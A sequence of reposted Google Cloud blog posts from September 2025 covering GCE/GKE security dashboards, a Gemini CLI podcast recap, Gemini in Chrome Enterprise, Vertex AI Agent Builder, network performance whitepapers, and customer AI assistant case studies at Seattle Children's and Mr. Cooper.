Infrastructure administrators face critical security challenges such as publicly accessible storage, software flaws, excessive permissions, and malware. That’s why we’ve introduced new, integrated security dashboards in GCE and GKE consoles, powered by Security Command Center (SCC). Available now, these dashboards can provide critical security insights and proactively highlight potential vulnerabilities, misconfiguration risks, and active threats relevant to your compute engine instances and Kubernetes clusters.

Embedding crucial security insights directly in GCE and GKE environments can empower you to address relevant security issues faster, and play a key role in maintaining a more secure environment over time.

Gain better visibility, directly where you work

The GCE Security Risk Overview page now shows top security findings, vulnerability findings over time, and common vulnerabilities and exploits (CVEs) on your virtual machines. These security insights, powered by Google Threat Intelligence, provide dynamic analysis based on the latest threats uncovered by Mandiant expert analysts. With these insights, you can make better decisions such as which virtual machine to patch first, how to better manage public access, and which CVEs to prioritize for your engineering team.

The top security findings can help prioritize the biggest risks in your environment such as misconfigurations that lead to overly accessible resources, critical software vulnerabilities, and potential moderate risks that may pose a combined critical risk.

Vulnerability findings over time can help assess how well your software engineering team is addressing known software vulnerabilities. CVE details are presented in two widgets: a heatmap distribution on the exploitability and potential impact of the vulnerabilities in your environment, and a list of the top five CVEs found in your virtual machines.

1 - GCE security dashboard — New GCE Security Risk Dashboard highlights top security insights.

The updated GKE console is similar, designed to help teams make better remediation decisions and catch threats before they escalate. A dedicated GKE security page displays streamlined findings on misconfigurations, top threats, and vulnerabilities:

The Workloads configuration widget highlights potential misconfigurations, such as over-permissive containers and pod and namespace risks.
Top threats highlight Kubernetes and container threats, such as cryptomining, privilege escalation, and malicious code execution.
Top software vulnerabilities highlight top CVEs and prioritize them based on their prevalence in your environment and the severity impact.

2 - GKE security dashboard — New GKE Security Posture Dashboard highlights key security insights.

Fully activate dashboards by upgrading to Security Command Center Premium

The GCE and GKE security dashboards, powered by Security Command Center, include the security findings widget (in the GCE dashboard) and the workload configurations widget (in the GKE dashboard).

To access the vulnerabilities and threats widgets, we recommend upgrading to Security Command Center Premium directly from the dashboards, available as a 30-day free trial. You can review the GCE documentation and GKE documentation to learn more about the security dashboards. To learn more about Security Command Center Premium and our different service tiers review the service tier documentation. You can learn more about Security Command Center Premium here.

Read More for the details.

2025 09 19

GCP – Agent Factory Recap: Deep Dive into Gemini CLI with Taylor Mullen

Tibor Kiss Cloud, Google Cloud gcp

In the latest episode of the Agent Factory podcast, Amit Miraj and I took a deep dive into the Gemini CLI. We were joined by the creator of the Gemini CLI, Taylor Mullen, who shared the origin story, design philosophy, and future roadmap.

This post guides you through the key ideas from our conversation. Use it to quickly recap topics or dive deeper into specific segments with links and timestamps.

What is the Gemini CLI?

The Gemini CLI is a powerful, conversational AI agent that lives directly in your command line. It’s designed to be a versatile assistant that can help you with your everyday workflows. Unlike a simple chatbot, the Gemini CLI is agentic. This means it can reason, choose tools, and execute multi-step plans to accomplish a goal, all while keeping you informed. It’s open-source, extensible, and as we learned from its creator, Taylor Mullen, it’s built with a deep understanding of the developer workflow.

The Factory Floor

The Factory Floor is our segment for getting hands-on. This week, we put the Gemini CLI to the test with two real-world demos designed to tackle everyday challenges.

Onboarding to a New Codebase with Gemini CLI

Timestamp: [02:22]

I kicked off the demos by tackling a problem I think every developer has faced: getting up to speed with a new codebase. This included using the Gemini CLI to complete the following tasks:

Clone the python ADK repository from GitHub with a simple, natural language command
Generate a complete project overview
Utilize the google-docs-mcp (Model Context Protocol) server to save the generated summary directly to Google Docs
Analyze the project’s contribution history to understand contribution culture and workflow
Find the best first task for a new contributor

Supercharging Your Research with Gemini CLI

Timestamp: [11:38]

For the next demo, Amit tackled a problem close to his heart: keeping up with the flood of new AI research papers. He showed how he built a personal research assistant using the Gemini CLI to complete the following tasks:

Process a directory of research papers and generate an interactive webpage explainer for each one
Iterate on a simple prompt, creating a detailed, multi-part prompt to generate a better output
Save the complex prompt as a reusable custom slash command

Amit also shared gemini-cli-custom-slash-commands, a repository he put together that contains 10 practical workflow commands for Gemini CLI.

The Agent Industry Pulse

Timestamp: [17:26]

Lang Chain 1.0 Alpha: The popular library is refocusing around a new unified agent abstraction built on Lang Graph, bringing production-grade features like state management and human-in-the-loop to the forefront.
Embedding Gemma: Google’s new family of open, lightweight embedding models that allow developers to build on-device, privacy-centric applications.
Agentic Design Patterns for Building AI Applications: A new book that aims to create a repository of educational resources around agent patterns.
Gemma 3 270M: A tiny 270 million parameter model from Google, perfect for creating small, efficient sub-agents for simple tasks.
Gemini CLI in Zed Code Editor: The Gemini CLI is now integrated directly into the Z Code editor, allowing developers to explain code and generate snippets without switching contexts.
500 AI Agents Projects: A GitHub repository with a categorized list of open-source agent projects.
Transformers & LLMs cheatsheet: A resource from a team at Stanford that provides a great starting point or refresher on the fundamentals of LLMs.

Taylor Mullen on the Gemini CLI

The highlight of the episode for me was our in-depth conversation with Taylor Mullen. He gave us a fascinating look behind the curtain at the philosophy and future of the Gemini CLI. Here are some of the key questions we covered:

Gemini CLI Origin Story

Timestamp: [21:00]

Taylor explained that the project started about a year and a half ago as an experiment with multi-agent systems. While the CLI version was the most compelling, the technology at the time made it too slow and expensive. He said it was “one of those things… that was almost a little bit too early.” Later, seeing the developer community embrace other AI-powered CLIs proved the demand was there. This inspired him to revisit the idea, leading to a week-long sprint where he built the first prototype.

On Building in the Open

Timestamp: [24:14]

For Taylor, the number one reason for making the Gemini CLI open source was trust and security. He emphasized, “We want people to see exactly how it operates… so they can have trust.” He also spoke passionately about the open-source community, calling it the “number one thing that’s on my mind.” He sees the community as an essential partner that helps keep the project grounded, secure, and building the right things for users.

Using Gemini CLI to Build Itself

Timestamp: [27:05]

When I asked Taylor how his team manages to ship an incredible 100 to 150 features, bug fixes, and enhancements every single week, his answer was simple: they use the Gemini CLI to build itself.

Taylor shared a story about the CLI’s first self-built feature: its own Markdown renderer. He explained that while using AI to 10x productivity is becoming easier, the real challenge is achieving 100x. For his team, this means using the agent to parallelize workflows and optimize human time. It’s not about the AI getting everything right on the first try, but about creating a tight feedback loop for human-AI collaboration at scale.

Gemini CLI under the hood: “Do what a person would do”

Timestamp: [30:58]

The guiding principle, Taylor said, is to “do what a person would do and don’t take shortcuts.” He revealed that, surprisingly, the Gemini CLI doesn’t use embeddings for code search. Instead, it performs an agentic search, using tools like grep, reading files, and finding references. This mimics the exact process a human developer would use to understand a codebase. The goal is to ground the AI in the most relevant, real-time context possible to produce the best results.

On Self-Healing and Creative Problem-Solving

Timestamp: [33:14]

We also discussed the agent’s ability to “self-heal.” When the CLI hits a wall, it doesn’t just fail; it proposes a new plan. Taylor gave an example where the agent, after being asked for a shareable link, created a GitHub repo and used GitHub Pages to deploy the content.

What’s Next: The Future is Extensible

Timestamp: [35:19]

The team is doubling down on extensibility. The vision is to create a rich ecosystem where anyone can build, share, and install extensions. These are not just new tools, but curated bundles of commands, instructions, and MCP servers tailored for specific workflows. He’s excited to see what the community will build and how users will customize the Gemini CLI for their unique needs.

Your turn to build

The best way to understand the power of the Gemini CLI is to try it yourself.

Check out the Gemini CLI on GitHub to see community projects, file an issue, or contribute. Additionally, don’t miss the full conversation: watch the episode and subscribe to The Agent Factory to join us for our next deep dive.

Connect with us

Taylor → LinkedIn, BlueSky, X
Amit → LinkedIn, X, TikTok
Mollie → LinkedIn, BlueSky, X

Read More for the details.

2025 09 18

GCP – Supercharging Employee Productivity with AI, Securely, with Gemini in Chrome Enterprise

Tibor Kiss Cloud, Google Cloud gcp

AI is transforming how people work and how businesses operate. But with these powerful tools comes a critical question: how do we empower our teams with AI, while ensuring corporate data remains protected?

A key answer lies in the browser, an app most employees use every day, for most of their day. Today, we announced several new AI advancements coming to Chrome, which redefine how browsers can help people with daily tasks, and work is no exception. Powerful AI capabilities right in the browser will help business users be more productive than ever, and we’re giving IT and security teams the enterprise-grade controls they need to keep company data safe.

Gemini in Chrome, with enterprise protections

Our work days can be full of distractions— endless context switching between projects, and repetitive tasks that slow people down. That’s why we’re bringing a new level of assistance directly into the browser, where many of these workflows are already taking place.

Gemini in Chrome¹ is an AI browsing assistant that helps people at work. It can cut through the complexity of finding and making use of information across tabs and help people get work done faster. Employees can now easily summarize long and complex reports or documents, grab key insights from a video, or even brainstorm ideas for a new project with help from Gemini in Chrome. Gemini in Chrome can understand the context of a user’s tabs, and soon it will even help recall recent tabs they had open.

History Recall — Gemini in Chrome will be able to recall your past tabs for you

We’re bringing these capabilities to Google Workspace business and education customers with enterprise-grade data protections, ensuring IT teams stay in control of their company’s data.

Gemini in Chrome doesn’t just help you find information that you need for your workday, you can also take action through integrations with Google apps people use every day like Google Calendar, Docs and Drive. So employees can schedule a meeting right in their current workflows.

Workspace app integration — Gemini in Chrome is now integrated with your favorite Google apps

Gemini in Chrome is becoming available for Mac and Windows users in the U.S., and we’re also bringing Gemini in Chrome to mobile in the U.S. Users can also activate Gemini when using Chrome on Android, and other apps, by holding the power button. And starting soon, on iOS Gemini in Chrome will be built into the app.

IT teams can configure Gemini in Chrome through policies in Chrome Enterprise Core, and enterprise data protections automatically extend to customers with qualifying editions of Google Workspace.

AI Mode from Google Search in Chrome

In addition to Gemini in Chrome, the Chrome omnibox—the address bar people use to navigate the web—is also getting an upgrade. With AI Mode, people can ask complex, multi-part questions specific to their needs in the same place where they already search. You’ll get an AI-generated response, and can keep exploring with follow-up questions and helpful web links. IT teams can manage this feature through the generative AI policies in Chrome Enterprise Core.

Proactive AI Protection

We know that a browser’s greatest value is its ability to keep users safe. As the security threats from AI-generated scams and phishing attacks become more sophisticated, our defenses must evolve just as quickly. That’s why security is one of the core pillars of Chrome’s AI strategy.

Safe Browsing’s Enhanced Protection mode is now even more secure with the help of AI. We’re using it to proactively block increasingly convincing threats such as tech support scams, and will be expanding to fake anti/virus and impersonated brand websites soon. We’ve also added AI to help detect and block scammy and spammy site notifications, which has already led to billions fewer notifications being sent to Chrome on Android users every day.

AI with enterprise controls

Organizations want to empower their workforce with AI for greater productivity, but never at the expense of security. Chrome Enterprise gives IT teams the tools they need to manage these new capabilities effectively: our comprehensive policies allow IT and security teams to decide exactly which AI features in Chrome are enabled for which users, and how that data is treated.

Chrome Enterprise Premium allows organizations even more safeguards. For example, they can use URL filtering to block unapproved AI tools and point employees back to corporate supported AI services. Within AI tools, security teams can apply data masking or other upload and copy/paste restrictions for sensitive data. These advanced capabilities further prevent sensitive information from being accidentally or maliciously shared via AI tools or any other web sites.

With Chrome Enterprise, AI in the browser offers businesses the best of both worlds: a highly productive, AI-enhanced user experience and the enterprise-grade security enterprises depend on to protect their data. To learn more about these new features, view our recent Behind the Browser AI Edition video.

^{1 Check responses for accuracy. Available on select devices and in select countries, languages, and to users 18+}

Read More for the details.

2025 09 18

GCP – Achieve agentic productivity with Vertex AI Agent Builder

Tibor Kiss Cloud, Google Cloud gcp

Enterprises need to move from experimenting with AI agents to achieving real productivity, but many struggle to scale their agents from prototypes to secure, production-ready systems.

The question is no longer if agents deliver value, but how to deploy them with enterprise confidence. And there’s immense potential for those who solve the scaling challenge. Our 2025 ROI of AI Report reveals that 88% of agentic AI early adopters are already seeing a positive return on investment (ROI) on generative AI.

Vertex AI Agent Builder is the unified platform that helps you close this gap. It’s where you can build the smartest agents, and deploy and scale them with enterprise-grade confidence.

Today, we’ll walk you through agent development on Vertex AI Agent Builder, and highlight a couple of key updates to fuel your next wave of agent-driven productivity and growth.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e7d8c08a4f0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

The five pillars of enterprise agent development on Vertex AI Agent Builder

Moving an agent from prototype to production requires a cohesive suite of tools. Vertex AI Agent Builder simplifies this complexity by providing an integrated workflow across five essential pillars, supporting your agent through every step of its lifecycle.

1. Agent frameworks
Your agent development journey begins here. You configure and orchestrate your agents using your preferred open source framework. The Agent Development Kit (ADK) – what we use internally at Google – is one of the many options available, and it has already seen over 4.7 million downloads since April.

2. Model choice
Models are the intelligent core of your agent. Our platform is provider-agnostic, supporting every leading model – including the Gemini 2.5 model family – alongside hundreds of third-party and open source models from Vertex AI Model Garden. With the ability to Provision Throughput, you can secure dedicated capacity for consistent, low-latency performance at scale.

3. Tools for taking actions
Once built, your agent needs tools to take action and interact with the real world. Grounding is a critical step that connects your AI to verifiable, real-time data – dramatically reducing hallucinations and building user trust. On Vertex AI, you can connect your agent to trusted, real-time data sources you already rely on. For example, Grounding with Google Maps is now available for everyone in production. Your agents gain accuracy and the ability to reduce hallucinations by accessing the freshness of Google Maps, which includes factual information on 250 million places for location-aware recommendations and actions.

4. Scalability and performance
Deploy and manage at scale using Vertex AI Agent Engine. We built this suite of modular, managed services to instantly move your prototypes into production. The platform provides everything needed for operation and scaling, including a fully managed runtime, integrated Sessions and Memory Bank to personalize context across user interactions, and integrated evaluation and observability services.

Since launch, hundreds of thousands of agents have been deployed to Vertex AI Agent Engine. Here are some recent updates we’re most excited about:

Secure code execution: We now provide a managed, sandboxed environment to run agent-generated code. This is vital for mitigating risks while unlocking advanced capabilities for tasks like financial calculations or data science modeling .
Agent-to-Agent collaboration: Build sophisticated, reliable multi-agent systems with native support for the Agent-to-Agent (A2A) protocol when you deploy to the Agent Engine runtime. This allows your agents to securely discover, collaborate, and delegate tasks to other agents, breaking down operational silos .
Real-Time interactive agents: Unlock a new class of interactive experiences with Bidirectional Streaming. This provides a persistent, two-way communication channel ideal for real-time conversational AI, live customer support, and interactive applications that process audio or video inputs .
Simplified path to production: We have streamlined the journey from a local ADK prototype to a live service, with a one-line deployment in the ADK CLI to Agent Engine.

5. Built-in trust and security
Security and compliance are built into every layer of the Vertex AI architecture, ensuring control is paramount. This includes preventing data exfiltration with Virtual Private Cloud Service Controls (VPC-SC) and using your own encryption keys with Customer-Managed Encryption Keys (CMEK). We also meet strict compliance milestones like HIPAA and Data Residency (DRZ) compliance requirements. Your agents can handle sensitive workloads in highly regulated industries with full confidence.

Get started today

It’s time to move your AI strategy from experimentation to exponential growth. Bridge the production gap and deploy your first enterprise agent with Vertex AI Agent Builder, the secure, scalable, and intelligent advantage you need to succeed.

Read More for the details.

2025 09 18

GCP – Network Performance Decoded: Much ado about headers, data and bitrates

Tibor Kiss Cloud, Google Cloud gcp

We are happy to drop the third installment of our Network Performance Decoded whitepaper series, where we dive into topics in network performance and benchmarking best practices that often come up as you troubleshoot, deploy, scale, or architect your cloud-based workloads. We started this series last year to provide you helpful tips to not only make the best of your network but also avoid costly mistakes that can drastically impact your application performance. Check out our last two installments — tuning TCP and UDP bulk flows performance, and network performance limiters.

In this installment, we provide an overview of three recent whitepapers — one on TCP retransmissions, another on the impact of headers and MTUs on data transfer performance, and finally, using netperf to measure packets per second performance.

1. Make it snappy: Tuning TCP retransmission behaviour

The A Brief Look at Tuning TCP Retransmission Behaviour whitepaper is all about how to make your online applications feel snappier, by tweaking two Linux TCP settings, net.ipv4.tcp_thin_linear_timeouts and net.ipv4.tcp_rto_min_us (or rto_min) Think of it as fine-tuning your application’s response times and how quickly your application recovers when there’s a hiccup in the network.

For all the gory details, you’ll need to read the paper, but here’s the lowdown on what you’ll learn:

Faster recovery is possible: By playing with these settings, especially making rto_min smaller, you can drastically cut down on how long your TCP connections just sit there doing nothing after a brief network interruption. This means your apps respond faster, and users have a smoother experience.
Newer kernels are your friend: If you’re running a newer Linux kernel (like 6.11 or later), you can go even lower with rto_min (down to 5 milliseconds!). This is because these newer kernels have smarter ways of handling things, leading to even quicker recovery.
Protective ReRoute takes resiliency to the next level: For those on Google Cloud, tuning net.ipv4.tcp_rto_min_us can actually help Google Cloud’s Protective ReRoute (PRR) mechanism kick in sooner, making your applications more resilient to network issues.
Not just for occasional outages: Even for random, isolated packet loss, these tweaks can make a difference. If you have a target for how quickly your app should respond, you can use these settings to ensure TCP retransmits data well before that deadline.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 to try Google Cloud networking’), (‘body’, <wagtail.rich_text.RichText object at 0x3eed51df5cd0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

2. Beyond network link-rate

Consider more than just “link-rate” when thinking about network performance! In our Headers and Data and Bitrates whitepaper, we discuss how the true speed of data transfer is shaped by:

Headers: Think of these as necessary packaging that reduces the actual data sent per packet.
Maximum Transmission Units (MTUs): These dictate maximum packet size. Larger MTUs mean more data per packet, making your data transfers more efficient.

In cloud environments, a VM’s outbound data limit (egress cap) isn’t always the same as the physical network’s speed. While sometimes close, extra cloud-specific headers can still impact your final throughput. Optimize your MTU settings to get the most out of your cloud network. In a nutshell, it’s not just about the advertised speed, but how effectively your data travels!

3. How many transactions can you handle?

In Measuring Aggregate Packets Per Second with netperf, you’ll learn how to use netperf to figure out how many transactions (and thus packets) per second your network can handle, which is super useful for systems that aren’t just pushing huge files around. Go beyond just measuring bulk transfers and learn a way to measure the packets per second rates which can gate the performance of your request/response applications.

Here’s what you’ll learn:

Beating skew error: Ever noticed weird results when running a bunch of netperf tests at once? That’s “skew error,” and this whitepaper describes using “demo mode” to fix it, giving you way more accurate overall performance numbers.
Sizing up your test: Get practical tips on how many “load generators” (the machines sending the traffic) and how many concurrent streams you need to get reliable results. Basically, you want enough power to truly challenge your system.
Why UDP burst mode is your friend: It explains why using “burst-mode UDP/RR” is the secret sauce for measuring packets per second. TCP, as smart as it is, can sometimes hide the true packet rate because it tries to be too efficient.
Full-spectrum testing and analysis: The whitepaper walks you through different test types you can run with the runemomniaggdemo.sh script, giving you an effective means to measure how many network transactions per second the instance under test can achieve. This might help you infer aspects of the rest of your network that influence this benchmark. Plus, it shows you how to crunch the numbers and even get some sweet graphs to visualize your findings.

Stay tuned

With these resources our goal is to foster an open, collaborative community for network benchmarking and troubleshooting. While our examples may be drawn from Google Cloud, the underlying principles are universally applicable, no matter where your workloads operate. You can access all our whitepapers — past, present, and future — on our webpage. Be sure to check back for more!

Read More for the details.

2025 09 18

GCP – Inside the AI-powered assistant helping doctors work faster and better at Seattle Children’s Hospital

Tibor Kiss Cloud, Google Cloud gcp

Though its name may suggest otherwise, Seattle Children’s is the largest pediatric healthcare system in the world.

While its main campus is in its namesake city, Seattle Children’s also encompasses 47 satellite hospitals across Alaska, Montana, Idaho, and Washington, and patients come from as far away as Hawaii for treatment. For more than 100 years, Seattle Children’s has helped kids across the Western U.S. get healthy and stay healthy, regardless of the ability to pay.

With so much ground to cover and diverse patient populations to treat, Seattle Children’s has always looked to new technologies to bring improved, consistent care to its patients and providers. Generative AI is now the latest advance in their medical toolkit.

It started roughly two decades ago, when Seattle Children’s created its pediatric clinical pathways, a set of standardized protocols designed to help clinicians make quicker and more reliable decisions to address dozens of medical conditions. Such pathways were becoming commonplace across medicine, and Seattle Children’s had developed some of the first for children’s unique medical needs.

Innovative as these were, they still required clinicians to thumb through indexes and long binders of information to find what they needed for a given ailment. And in healthcare, it’s often the case that every second counts.

Seattle Children’s was already working with Google Cloud on a number of projects, and as we began to explore the potential for generative AI to make the work of our clinicians easier, the clinical pathways seemed like an obvious place to start. Using Vertex AI and Gemini, we were able to quickly develop our Pathways Assistant, which took training from the clinical pathways documentation and supercharged it with not just searchability but conversationality.

Instead of flipping pages, we’d flipped the script on how quickly and reliably clinicians could find the lifesaving information they needed.

The pathways to improved healthcare run through Gemini
“Clinical pathways” are end-to-end treatment protocols for a specific condition or illness. Seattle Children’s pediatric clinical pathways are widely respected and used by hospitals around the globe, providing information on everything from diagnostic criteria to testing protocols to medication recommendations.

Previously, these clinical pathways were documented exclusively in PDFs — hundreds of thousands of pages of them. Performing a traditional search of their contents for the answers clinicians needed delayed their ability to provide treatment in an environment where minutes or even seconds can be critical.

Google Cloud engineers worked with Seattle Children’s informatics physicians, who straddle the worlds of healthcare and technology, to create Pathway Assistant. The new multimodal AI chatbot that responds to spoken or written natural-language queries using the information in those PDFs.

After processing a question, Pathway Assistant searches each PDF’s metadata, which contains semi-structured data in JSON format that’s been extracted from the PDFs by Gemini and curated by clinicians. It then selects the most relevant PDFs, parses the information — including any complex flowcharts, diagrams, and illustrations embedded in them — and answers the clinician’s question in just a few seconds.

Interactive information-finding for accurate decision-making
Pathway Assistant becomes more accurate with use. Healthcare providers can “discuss” clinical pathways with the chatbot, which, instead of answering a question, poses questions of its own if it needs clarification, going back and forth until it’s confident it can answer accurately. The chatbot always displays the specific sections of each PDF that was the source for formulating its answers, helping clinicians confirm the veracity of responses.

The interface also includes a way for users to provide feedback about the accuracy and appropriateness of the chatbot’s analysis and answers. The feedback is then logged in a BigQuery table for future forensic analysis — both by clinicians, who can query the information using natural language, and by the built-in Gemini models, which processes the feedback and summarizes what clinicians found confusing or how to improve the accuracy of future answers.

This reflexive capability enables Pathway Assistant to update the PDFs based on clinicians’ feedback if the inaccuracy stemmed from the PDF’s content. Clinicians are also finding that the metadata is becoming more accurate and requiring less curation. Pathway Assistant even corrects typos in the documentation automatically. And as new clinical pathways are developed, PDFs containing the latest information are added to the PDF library.

This growing collection is housed securely in Google Cloud Storage, and the bigger it gets, the more useful it becomes — which wasn’t always the case. Whereas an expanding paper-based collection contained more information, it was also more material to wade through, which is especially challenging in emergency medical situations. Pathway Assistant almost entirely relieves this burden, synthesizing and delivering the most complete information at any time in a matter of seconds.

Ultimately, Pathway Assistant is not a decision-making tool but rather an information-finding tool. Research into critical, evidence-based guidelines that used to take hours now takes minutes.

This speed and effectiveness helps clinicians make the right decisions more quickly at the point of care, drastically reducing research time and improving patient safety and outcomes. Ultimately, clinicians can spend more time with more patients, not with more PDFs.

Ask any physician, they’ll tell you that’s what the best medical technology enables them to do — focus on the patient, not paperwork.

Read More for the details.

2025 09 18

GCP – How Mr. Cooper assembled a team of AI agents to handle complex mortgage questions

Tibor Kiss Cloud, Google Cloud gcp

In today’s world where instant responses and seamless experiences are the norm, industries like mortgage servicing face tough challenges. When navigating a maze of regulations, piles of financial documents, and the high stakes of homeownership, consumers quickly find that even simple questions can turn into complicated issues. And the same can be true for the customer reps trying to help them navigate all that complexity.

Like many enterprises, Mr. Cooper is exploring how agentic AI and advanced AI agents can help both our customers and employees meet their needs with confidence. In our work to develop just such an agent with Google Cloud, one of our curious discoveries has been that like a good team, the best AI agents may just be made up of groups of agents with distinct skillsets and abilities, and we come to the best results when they’re working in concert.

At Mr. Cooper, our mission is to “Keep the dream of homeownership alive.”We’re here to simplify the journey, provide clarity, and ensure our customers feel confident every step of the way. That confidence is key when they’re making one of the most consequential purchases, and decisions, of their lives.

With those dual goals of simplicity and certainty in mind, we partnered with Google Cloud to develop an agentic AI framework designed to complement and support our team. We call it the Coaching Intelligent Education & Resource Agent, or CIERA. We asked ourselves how to implement a chatbot that could effectively collaborate with our human agents to streamline both sides of the customer service experience.

And just as we prioritize hiring great groups of customer reps and mortgage agents, we’ve discovered how important it is to put together the right group of agents to effectively meet the needs of all our users. CIERA is designed to do exactly that, handling routine and time-consuming tasks to enhance efficiency, while empowering our people to focus on delivering what they do best — empathy, judgment and meaningful human connection.

CIERA represent an exciting step forward in blending human expertise with AI capabilities, creating a collaborative approach that elevates both the customer experience and our team’s impact. And just as important as this work is for Mr. Cooper, CIERA also demonstrates how our multi-agent approach can serve as a model for companies across industries. Read on to learn how we did it, and how you can, too.

The challenge: Beyond the reach of traditional automation

Mortgage servicing is uniquely complex, where a customer might have a single question that requires an agent to cross-reference multiple documents.

This presents several challenges for traditional automation:

Siloed Knowledge: Scattered information makes it hard to see the full picture, but AI surfaces key data, helping agents make faster, smarter decisions for customers.

Lack of Understanding: Traditional systems rely on rigid keywords and decision trees, often missing the true intent behind customer inquiries. Our AI framework uncovers context and intent, equipping agents with the insights they need to respond with empathy and accuracy.

Inflexible Processes: When conversations take unexpected turns, legacy automation often fails, creating dead ends for customers and the team. AI provides real-time adaptive guidance, helping agents navigate these twists seamlessly.

To truly elevate the customer experience, we needed a solution capable of reasoning, orchestrating, and understanding context — one that enhances and amplifies our capabilities to deliver exceptional service.

The vision: Introducing CIERA, a collaborative AI agent workforce

Our vision was to create an agentic framework that supports our call center agents by leveraging Google Cloud’s Vertex AI platform. CIERA’s AI agents handle repetitive and complex tasks, allowing our team to focus on what technology can’t.

Guided by the principle that AI enhances human performance, these digital collaborators are designed to deliver accurate, comprehensive, and human-centered solutions.

Building the agent workforce: Our architectural blueprint
Our modular architecture assigns distinct roles to each AI agent, creating a scalable, efficient. and manageable system that seamlessly collaborates with people to make work smoother and more rewarding.

Meet the key players of our digital team and the solutions they deliver for team members and customers:

Sage, the Head Agent: Sage monitors how all other AI agents perform. By learning from patterns across workflows, Sage helps ensure that each AI agent works in harmony with human teams. Key abilities include intelligent agent monitoring, recognizing useful trends and fine-tuning orchestration.

Ava, the Orchestrator: Ava serves as the team’s coordinator, managing complex customer inquiries by breaking them into manageable tasks and assigning them to the appropriate AI assistants. While Ava doesn’t interact directly with customers, it ensures processes run smoothly, empowering human agents to remain central to delivering solutions.
Lex, the Task Specialist: Lex specializes in complex tasks, helping human agents during customer calls by quickly offering insights to questions around loan applications or escrow analyses. Working behind the scenes, Lex provides insights that allow people to focus on connecting with customers and making informed decisions.
Sky, the Data Specialist: Sky helps human teams navigate internal knowledge bases and FAQs. For questions about policies, procedures, or definitions, Sky provides accurate and timely information, freeing people to spend more time on meaningful interactions, rather than searching for data.
Remy, the Memory Agent: Remy assists by remembering past actions and outcomes, which helps personalize workflows and inform future decisions. Remy’s memory supports ongoing learning and training, making it easier for human agents to access shared knowledge and continuously improve their skills.
Iris, the Evaluation Agent: By evaluating confidence scores, detecting hallucinations, and grounding responses with Model Armor, Iris ensures consistency and authenticity, helping human agents provide trustworthy customer support.

1_MrCooper-ai-team-workflow-1 — A sample analysis performed by CIERA.

How it works in practice: A real-life scenario

Imagine a customer initiates a call asking, “I received a notice my escrow payment is increasing. Can you explain why and tell me what my new total payment will be?”

Instead of relying solely on automated responses, CIERA ensures every step is grounded in close partnership between AI agents and human team members:

Orchestration: Ava receives the query, understands the two distinct parts (the “why” and the “what”), and creates a plan. Ava consults with a human agent, confirms the correct context and then delegates tasks to the Lex agents.
Parallel Processing: With human oversight, Ava assigns the “why” task to Lex, pointing it to the customer’s most recent escrow analysis document. Simultaneously, it tasks another Lex agent to calculate the new total payment based on data from our systems.
Synthesis: The Lex agent reads the document and reports back to the human agent: “The increase is due to a $200 annual rise in property taxes.” The other agent confirms the new total payment. The human similarly reviews the payment calculation before moving ahead.
Resolution: Ava gathers all AI-generated insights, but the human agent validates and personalizes the final response as needed to ensure clarity, empathy, and accuracy before delivering it to the customer.

This human-in-the-loop approach ensures complex, multifaceted questions are resolved with both the efficiency of advanced AI and understanding nuances with the trust that only people can provide. The partnership guarantees every answer is not just quick, but also trustworthy and tailored to the customer’s needs.

Ensuring quality and trust: The “agentic pulse” and human oversight

In a regulated industry like ours, trust and accuracy are non-negotiable. Deploying advanced AI requires an equally advanced framework for evaluation and governance. To achieve this, we developed two key concepts:

The “Agentic Pulse” Dashboard: Our central command center for monitoring the health and performance of our agent workforce. Powered by model-based evaluation services within the Vertex AI platform , it goes beyond simple metrics. We track:
- Faithfulness: Is the agent’s answer grounded in the source documents
- Relevance: Does the answer directly address the customer’s question
- Safety: Does the agent avoid generating harmful or inappropriate content
- Business Metrics: How do we correlate these quality scores with classic KPIs like average handle time (AHT) and customer satisfaction (CSAT)
The “Sandbox” for HITL: Our “Sandbox” environment provides space for our business and technical teams to safely review, test and refine agent processes. Additionally, if the “Agentic Pulse” flags an interaction for review, a human expert can analyze the agent’s reasoning and provide feedback, ensuring a continuous cycle of improvement and learning.

This robust governance framework gives us the confidence to deploy these powerful tools responsibly.

2_MrCooper-ai-team-workflow-2 — Example of a theoretical loan analysis assisted by CIERA.

Projected impact: From complex processes to clear wins

While CIERA is on its journey towards full production, our projections based on extensive testing and modelling point to historic and transformative gains across the board:

For our customers: We project a reduction in wait times and a higher rate of first-contact resolution, so customers can get answers quicker and with the benefits of round-the-clock support for many complex scenarios.

For our human agents: By automating tedious research, CIERA will free up our human agents to focus on sensitive and complex customer relationships that require a human touch and create better tools and resources for more engaging work.

For our business: We anticipate a major reduction in average handling times for a large segment of inquiries and faster, more accurate resolutions that are a direct driver of customer happiness and loyalty.

Beyond mortgages: A blueprint for any complex industry

The architectural patterns developed with CIERA are not limited to mortgage servicing. This agentic approach — of using an orchestrator to manage a team of specialized AI agents—is a powerful blueprint that can be applied to any industry, including healthcare, logistics and manufacturing, by grappling with information and task complexity.

3_MrCooper-ai-team-architecture — A typical workflow with CIERA.

The future is agentic and collaborative

Our journey with CIERA is just beginning, but it has already solidified our belief that the future of customer service is agentic driven. By combining Mr. Cooper’s deep industry expertise with Google Cloud’s world-class AI infrastructure, we are not just building bots, we are cultivating a digital workforce.

This collaboration is about more than just lowering costs or improving efficiency — it’s about building trust, delivering clarity, and creating a customer experience truly worthy of the dream of homeownership.

^{The team would like to thank Googlers Sumit Agrawal and Crispin Velez and the GSD AI Incubation team for their support and technical leadership on agents and agent frameworks as well as their deep expertise in ADK, MCP, and large language model evaluations.}

Read More for the details.

2025 09 18

GCP – Partnering with Google Cloud MSSPs: Solving security challenges with expertise & speed

Tibor Kiss Cloud, Google Cloud gcp

Organizations today face immense pressure to secure their digital assets against increasingly sophisticated threats — without overwhelming their teams or budgets.

Using managed security service providers (MSSPs) to implement and optimize new technology, and handle security operations, is a strategic delegation that can make internal security operations staff more efficient and effective.

At Google Cloud, we understand the value that MSSPs can bring, so we’ve built a robust ecosystem of MSSP partners, specifically empowered to help you modernize security operations and achieve better security outcomes, faster.

MSSPs can help ease the pressure from three key challenges that can prevent organizations from staying ahead of threats, and achieving the cybersecurity outcomes they need to build operational resilience and power innovation to create growth.

